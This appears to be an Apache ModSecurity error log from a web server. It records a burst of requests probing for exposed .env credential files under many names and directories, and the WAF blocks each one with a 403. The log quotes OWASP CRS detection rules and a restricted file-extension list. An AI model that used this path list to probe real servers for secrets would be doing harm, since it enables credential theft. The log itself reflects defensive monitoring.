[Fri Mar 20 15:01:17.962495 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLTQ9Th-2Y9b0JRd1uQAAAAE"]
[Fri Mar 20 15:01:17.977174 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLW8zubx8zfwe9oW5OgAAAAU"]
[Fri Mar 20 15:01:17.977316 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLW8zubx8zfwe9oW5OgAAAAU"]
[Fri Mar 20 15:01:17.977412 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLW8zubx8zfwe9oW5OgAAAAU"]
[Fri Mar 20 15:01:17.977535 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab1TLW8zubx8zfwe9oW5OgAAAAU"]
[Fri Mar 20 15:01:17.982555 2026] [authz_core:error] [pid 2817640] [client 162.158.86.254:13016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Mar 20 15:01:17.996678 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLUGu3yPOFBRkxZtwxwAAAAA"]
[Fri Mar 20 15:01:17.996838 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLUGu3yPOFBRkxZtwxwAAAAA"]
[Fri Mar 20 15:01:17.996946 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLUGu3yPOFBRkxZtwxwAAAAA"]
[Fri Mar 20 15:01:17.997081 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab1TLUGu3yPOFBRkxZtwxwAAAAA"]
[Fri Mar 20 15:01:18.006939 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLpJiwBXnNifSr5verAAAAAQ"]
[Fri Mar 20 15:01:18.007046 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLpJiwBXnNifSr5verAAAAAQ"]
[Fri Mar 20 15:01:18.007171 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "ab1TLpJiwBXnNifSr5verAAAAAQ"]
[Fri Mar 20 15:01:18.021010 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLmLvrbuE12wYiLe4MgAAABA"]
[Fri Mar 20 15:01:18.021120 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLmLvrbuE12wYiLe4MgAAABA"]
[Fri Mar 20 15:01:18.021243 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "ab1TLmLvrbuE12wYiLe4MgAAABA"]
[Fri Mar 20 15:01:18.034304 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLvy1_WiwY9KfWu_4wwAAAAI"]
[Fri Mar 20 15:01:18.034476 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLvy1_WiwY9KfWu_4wwAAAAI"]
[Fri Mar 20 15:01:18.034618 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ab1TLvy1_WiwY9KfWu_4wwAAAAI"]
[Fri Mar 20 15:01:18.044928 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLknH70iMTzyPh3kWkQAAAAY"]
[Fri Mar 20 15:01:18.045056 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLknH70iMTzyPh3kWkQAAAAY"]
[Fri Mar 20 15:01:18.045186 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "ab1TLknH70iMTzyPh3kWkQAAAAY"]
[Fri Mar 20 15:01:18.368977 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLm8zubx8zfwe9oW5OwAAAAU"]
[Fri Mar 20 15:01:18.369110 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLm8zubx8zfwe9oW5OwAAAAU"]
[Fri Mar 20 15:01:18.369258 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab1TLm8zubx8zfwe9oW5OwAAAAU"]
[Fri Mar 20 15:01:18.389269 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLv9i5ZHhQgdGB68gIQAAAAg"]
[Fri Mar 20 15:01:18.389393 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLv9i5ZHhQgdGB68gIQAAAAg"]
[Fri Mar 20 15:01:18.389524 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "ab1TLv9i5ZHhQgdGB68gIQAAAAg"]
[Fri Mar 20 15:01:18.410462 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPGwAAAAM"]
[Fri Mar 20 15:01:18.410628 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPGwAAAAM"]
[Fri Mar 20 15:01:18.410841 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLqx8_pxqReT7SyGPGwAAAAM"]
[Fri Mar 20 15:01:18.430543 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOXwAAAAk"]
[Fri Mar 20 15:01:18.430677 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOXwAAAAk"]
[Fri Mar 20 15:01:18.430822 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLhq8pDZXKMuYECLOXwAAAAk"]
[Fri Mar 20 15:01:18.454623 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1ugAAAAE"]
[Fri Mar 20 15:01:18.454764 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1ugAAAAE"]
[Fri Mar 20 15:01:18.454917 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1ugAAAAE"]
[Fri Mar 20 15:01:18.474389 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4MwAAABA"]
[Fri Mar 20 15:01:18.474535 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4MwAAABA"]
[Fri Mar 20 15:01:18.474685 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLmLvrbuE12wYiLe4MwAAABA"]
